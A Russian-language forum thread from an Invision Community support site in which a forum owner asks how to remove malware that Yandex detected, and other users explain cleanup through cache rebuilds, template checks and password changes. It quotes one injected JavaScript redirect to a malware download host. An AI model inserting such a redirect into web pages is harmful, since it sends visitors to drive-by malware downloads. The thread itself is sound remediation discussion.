Перейти к публикации
View in the app

A better way to browse. Learn more.

Дизайн и модификация Invision Community

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Яндекс обнаружил вредоносный код на форуме

Опубликовано:

Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

Поведенческий анализ

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

Написал вопрос в саппорт, ответ был следующим:

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

Рекомендованные сообщения

Опубликовано:

Игорь, скорее всего ты прав - в том, что вирус заседает в шаблоне админ панели. Все это время, я его не мог поймать его в skin_global.php, а так-же БД.

После чистки cache всех шаблон, и папки с языками + удаления шаблона админ центра, а так-же всех JS, после перестроения всех кэшев и замены паролей, смены пути админ панели, смены пароля БД - фтп, запрет всем админам вход в АЦ.

Вирус начал отходить, последняя ссылка осталась для проверки в яндекс вебмастере. из 10 где-то

Опубликовано:

Код удаляется обновлением кешей стилей - Внешний Вид -> Инструменты -> Обновление кеш-файлов. Попутно нужно проверить шаблон includeJS в админцентре. Потом обязательно сменить пароли всех администраторов и к базе данных. Эти процедуры нужно проделать каждый раз после обнаружения вируса. Ко всему этому можно обновить и кеши языков.

Попутно нужно проверить шаблон includeJS в админцентре

Код с шаблона includeJS выложил в предыдущем посте (вирус там не нашел)

Потом обязательно сменить все пароли администраторов и к базе данных.

Все пароли еще раз поменял.

Опубликовано:

Код с шаблона includeJS выложил в предыдущем посте

Раз нету значит выкладывать блоки шаблона не нужно.

Шаблон желательно проверить для всех скинов.

Опубликовано:

Раз нету значит выкладывать блоки шаблона не нужно.

Шаблон желательно проверить для всех скинов.

у меня один скин на форуме

Опубликовано:

1. Проверка шаблона includeJS (Глобальные) в АЦ.

Скажите, пожалуйста, а если шаблон includeJS ни разу не редактировался (стоит черная метка), если в нем не принято никаких изменений с момента установки форума, значит всё в норме?

Опубликовано:
Скажите, пожалуйста, а если шаблон includeJS ни разу не редактировался (стоит черная метка), если в нем не принято никаких изменений с момента установки форума, значит всё в норме?

нет. Вирус может в кэше сидеть.

Вредоносный код сидит в /cache/skin_cache/cache_%id/skin_global.php, метод includeJS и имеет подобный вид:
Опубликовано:

@Атаман, нет такого кода у меня в кэше B)

Опубликовано:

@Атаман, ну а как этот вирус попал к Вам в кэш? У меня его нет ни в АЦ, ни в skin_global.php. Вспоминается тема про комплексную защиту форума))

Опубликовано:

@Атаман, ну а как этот вирус попал к Вам в кэш? У меня его нет ни в АЦ, ни в skin_global.php. Вспоминается тема про комплексную защиту форума))

Аналогично. не мог его найти нигде, но закрыл всем доступ, и тд. Выше все действия свои сказал. Форум стал оживать. Как сказал Игорь, возможно где-то права были не доставлены и тд.

Я просто все на корню удалил, и все пароли поменял, и ограничил админов.

Опубликовано:

Игорь спасибо за подсказку и решение данного вопроса. Вирус ушёл.

• 3 недели спустя...
Опубликовано:

я удаляю код по пути, который указал, он снова появляется, точно такой же, подскажи что делать?

на данный момент яндекс ругается на http://big-benz.ru/files/file/95-w463-300ge-g320-g500-tablitca-predohranitelej/

Опубликовано:

я удаляю код по пути, который указал, он снова появляется, точно такой же, подскажи что делать?

на данный момент яндекс ругается на http://big-benz.ru/f...redohranitelej/

Читайте тему полностью. Помимо удаления кода, нужно сменить пароли, проверить шаблон и т.д.
  • 1 месяц спустя...
Опубликовано:

Скажите, если заново переустановлю форум и накачу на него бекап БД. Естественно пароли к БД и админке сменю.

Вирус уйдет? Какие мысли?

Создайте аккаунт или войдите в него для комментирования

Сейчас на странице 0

• Нет пользователей, просматривающих эту страницу.

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.